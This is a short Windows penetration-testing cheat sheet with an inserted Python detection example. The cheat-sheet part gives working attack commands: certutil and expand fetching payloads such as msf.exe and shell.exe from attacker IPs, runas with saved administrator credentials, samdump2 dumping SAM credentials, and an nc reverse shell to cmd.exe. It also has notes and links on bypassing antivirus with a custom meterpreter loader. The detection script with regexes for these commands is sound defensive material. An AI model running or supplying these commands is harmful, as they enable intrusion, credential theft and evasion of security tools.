Downloading files

certutil -urlcache -split -f http://10.10.14.44:8181/msf.exe msf.exe

expand \\10.11.0.115\test\shell.exe shell.exe

Running commands as different user

runas /savecred /user:access\administrator "cmd /C DEL c:\temp\test.txt"

Samba

  • Connect without credentials

smbclient.py " / @10.10.10.134"

Dump credentials from SAM and SYSTEM

samdump2 SYSTEM SAM

Netcat reverse shell if you can upload it

nc -nv 10.10.12.105 9191 -e cmd.exe
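
On the defending side, the certutil, expand, runas and nc invocations above all show up in process-creation logging (Sysmon Event ID 1, Security 4688 with command-line auditing). The following is an added example, not part of the original cheat sheet: a small matcher run over constructed command lines. The rule names, regexes and the benign sample lines are assumptions made for illustration.

```python
import re

# Rule names and patterns are assumptions made for this example.
RULES = [
    # certutil's URL cache used as a downloader ("-" and "/" both introduce flags)
    ("certutil_url_download", r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://"),
    # expand.exe reading its source from a UNC path (\\host\share\...)
    ("expand_from_unc", r"\bexpand(\.exe)?\b.*\\\\[^\\\s]+\\"),
    # runas reusing credentials stored by an earlier /savecred
    ("runas_savecred", r"\brunas(\.exe)?\b.*/savecred\b"),
    # netcat attaching a command interpreter to a socket with -e
    ("netcat_exec_shell",
     r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-e\s+\S*(cmd|powershell)(\.exe)?\b"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

# Constructed process-creation command lines: the four commands from this page,
# each paired with a benign use of the same binary that must not be flagged.
SAMPLE_EVENTS = [
    r'certutil -urlcache -split -f http://10.10.14.44:8181/msf.exe msf.exe',
    r'certutil.exe -hashfile C:\temp\setup.msi SHA256',
    r'expand \\10.11.0.115\test\shell.exe shell.exe',
    r'expand C:\drivers\net.cab -F:* C:\drivers\out',
    r'runas /savecred /user:access\administrator "cmd /C DEL c:\temp\test.txt"',
    r'runas /user:CORP\helpdesk mmc.exe',
    r'nc -nv 10.10.12.105 9191 -e cmd.exe',
    r'"C:\Windows\System32\cmd.exe" /c dir',
]

def detect(cmdline):
    """Return the names of all rules whose pattern matches one command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]

def scan(events):
    """Return (command line, rule names) for every event that matched a rule."""
    return [(e, hits) for e in events if (hits := detect(e))]

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):24} {cmdline}")
```

Matching on the command line alone misses renamed binaries, so in practice these patterns are paired with the original file name or file hash recorded in the same event.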

Bypass AV by spoofing signature

CarbonCopy no longer works, it seems. Custom loader works.

https://astr0baby.wordpress.com/2019/01/26/custom-meterpreter-loader-in-2019/

Privesc cheat sheet

https://www.fuzzysecurity.com/tutorials/16.html